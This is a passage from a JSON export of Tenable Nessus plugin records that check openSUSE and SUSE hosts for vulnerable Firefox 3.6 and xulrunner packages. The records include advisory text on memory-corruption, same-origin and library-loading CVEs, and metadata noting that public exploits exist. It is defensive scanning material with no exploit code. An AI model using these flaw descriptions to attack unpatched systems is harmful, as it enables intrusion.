cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:03:49", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=645315", "https://bugzilla.novell.com/show_bug.cgi?id=649492"], "pluginID": "75648", "description": "This update brings Mozilla Firefox to version 3.6.12, fixing various bugs and security issues.\n\nThe following security issues were fixed: MFSA 2010-64: Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References\n\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - CVE-2010-3176\n\nGary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only.\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\nMFSA 2010-65 / CVE-2010-3179: Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data.\nAn attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer.\n\nMFSA 2010-66 / CVE-2010-3180: Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory.\n\nMFSA 2010-67 / CVE-2010-3183: Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory.\n\nMFSA 2010-68 / CVE-2010-3177: Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site.\n\nMFSA 2010-69 / CVE-2010-3178: Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript:\nURL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another website.\n\nMFSA 2010-70 / CVE-2010-3170: Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority.\n\nMFSA 2010-71 / CVE-2010-3182: Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n\nMFSA 2010-73 / CVE-2010-3765: Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms.", "edition": 4, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (MozillaFirefox-3422)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols", "p-cpe:/a:novell:opensuse:mozilla-js192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-js192-32bit"], "id": "SUSE_11_3_MOZILLAFIREFOX-101029.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75648", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-3422.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75648);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/06/13 21:55:23 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (MozillaFirefox-3422)\");\n script_summary(english:\"Check for the MozillaFirefox-3422 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Mozilla Firefox to version 3.6.12, fixing various\nbugs and security issues.\n\nThe following security issues were fixed: MFSA 2010-64: Mozilla\ndevelopers identified and fixed several memory safety bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these bugs showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code. References\n\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh\nSoref reported memory safety problems that affected Firefox 3.6 and\nFirefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - CVE-2010-3176\n\nGary Kwong, Martijn Wargers and Siddharth Agarwal reported memory\nsafety problems that affected Firefox 3.6 only.\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\nMFSA 2010-65 / CVE-2010-3179: Security researcher Alexander Miller\nreported that passing an excessively long string to document.write\ncould cause text rendering routines to end up in an inconsistent state\nwith sections of stack memory being overwritten with the string data.\nAn attacker could use this flaw to crash a victim's browser and\npotentially run arbitrary code on their computer.\n\nMFSA 2010-66 / CVE-2010-3180: Security researcher Sergey Glazunov\nreported that it was possible to access the locationbar property of a\nwindow object after it had been closed. Since the closed window's\nmemory could have been subsequently reused by the system it was\npossible that an attempt to access the locationbar property could\nresult in the execution of attacker-controlled memory.\n\nMFSA 2010-67 / CVE-2010-3183: Security researcher regenrecht reported\nvia TippingPoint's Zero Day Initiative that when\nwindow.__lookupGetter__ is called with no arguments the code assumes\nthe top JavaScript stack value is a property name. Since there were no\narguments passed into the function, the top value could represent\nuninitialized memory or a pointer to a previously freed JavaScript\nobject. Under such circumstances the value is passed to another\nsubroutine which calls through the dangling pointer, potentially\nexecuting attacker-controlled memory.\n\nMFSA 2010-68 / CVE-2010-3177: Google security researcher Robert\nSwiecki reported that functions used by the Gopher parser to convert\ntext to HTML tags could be exploited to turn text into executable\nJavaScript. If an attacker could create a file or directory on a\nGopher server with the encoded script as part of its name the script\nwould then run in a victim's browser within the context of the site.\n\nMFSA 2010-69 / CVE-2010-3178: Security researcher Eduardo Vela Nava\nreported that if a web page opened a new window and used a javascript:\nURL to make a modal call, such as alert(), then subsequently navigated\nthe page to a different domain, once the modal call returned the\nopener of the window could get access to objects in the navigated\nwindow. This is a violation of the same-origin policy and could be\nused by an attacker to steal information from another website.\n\nMFSA 2010-70 / CVE-2010-3170: Security researcher Richard Moore\nreported that when an SSL certificate was created with a common name\ncontaining a wildcard followed by a partial IP address a valid SSL\nconnection could be established with a server whose IP address matched\nthe wildcard range by browsing directly to the IP address. It is\nextremely unlikely that such a certificate would be issued by a\nCertificate Authority.\n\nMFSA 2010-71 / CVE-2010-3182: Dmitri Gribenko reported that the script\nused to launch Mozilla applications on Linux was effectively including\nthe current working directory in the LD_LIBRARY_PATH environment\nvariable. If an attacker was able to place into the current working\ndirectory a malicious shared library with the same name as a library\nthat the bootstrapping script depends on the attacker could have their\nlibrary loaded instead of the legitimate library.\n\nMFSA 2010-73 / CVE-2010-3765: Morten Kråkvik of Telenor SOC\nreported an exploit targeting particular versions of Firefox 3.6 on\nWindows XP that Telenor found while investigating an intrusion attempt\non a customer network. The underlying vulnerability, however, was\npresent on both the Firefox 3.5 and Firefox 3.6 development branches\nand affected all supported platforms.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649492\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-branding-upstream-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-translations-common-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-translations-other-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-js192-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-devel-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-js192-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:46:30", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=645315", "https://bugzilla.novell.com/show_bug.cgi?id=649492"], "pluginID": "50460", "description": "This update brings Mozilla Firefox to version 3.6.12, fixing various bugs and security issues.\n\nThe following security issues were fixed: MFSA 2010-64: Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References\n\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - CVE-2010-3176\n\nGary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only.\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\nMFSA 2010-65 / CVE-2010-3179: Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data.\nAn attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer.\n\nMFSA 2010-66 / CVE-2010-3180: Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory.\n\nMFSA 2010-67 / CVE-2010-3183: Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory.\n\nMFSA 2010-68 / CVE-2010-3177: Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site.\n\nMFSA 2010-69 / CVE-2010-3178: Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript:\nURL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another website.\n\nMFSA 2010-70 / CVE-2010-3170: Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority.\n\nMFSA 2010-71 / CVE-2010-3182: Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n\nMFSA 2010-73 / CVE-2010-3765: Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms.", "edition": 4, "reporter": "Tenable", "published": "2010-11-03T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (MozillaFirefox-3422)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols", "p-cpe:/a:novell:opensuse:mozilla-js192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-js192-32bit"], "id": "SUSE_11_1_MOZILLAFIREFOX-101028.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50460", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-3422.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50460);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2014/06/13 19:55:04 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (MozillaFirefox-3422)\");\n script_summary(english:\"Check for the MozillaFirefox-3422 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Mozilla Firefox to version 3.6.12, fixing various\nbugs and security issues.\n\nThe following security issues were fixed: MFSA 2010-64: Mozilla\ndevelopers identified and fixed several memory safety bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these bugs showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code. References\n\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh\nSoref reported memory safety problems that affected Firefox 3.6 and\nFirefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - CVE-2010-3176\n\nGary Kwong, Martijn Wargers and Siddharth Agarwal reported memory\nsafety problems that affected Firefox 3.6 only.\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\nMFSA 2010-65 / CVE-2010-3179: Security researcher Alexander Miller\nreported that passing an excessively long string to document.write\ncould cause text rendering routines to end up in an inconsistent state\nwith sections of stack memory being overwritten with the string data.\nAn attacker could use this flaw to crash a victim's browser and\npotentially run arbitrary code on their computer.\n\nMFSA 2010-66 / CVE-2010-3180: Security researcher Sergey Glazunov\nreported that it was possible to access the locationbar property of a\nwindow object after it had been closed. Since the closed window's\nmemory could have been subsequently reused by the system it was\npossible that an attempt to access the locationbar property could\nresult in the execution of 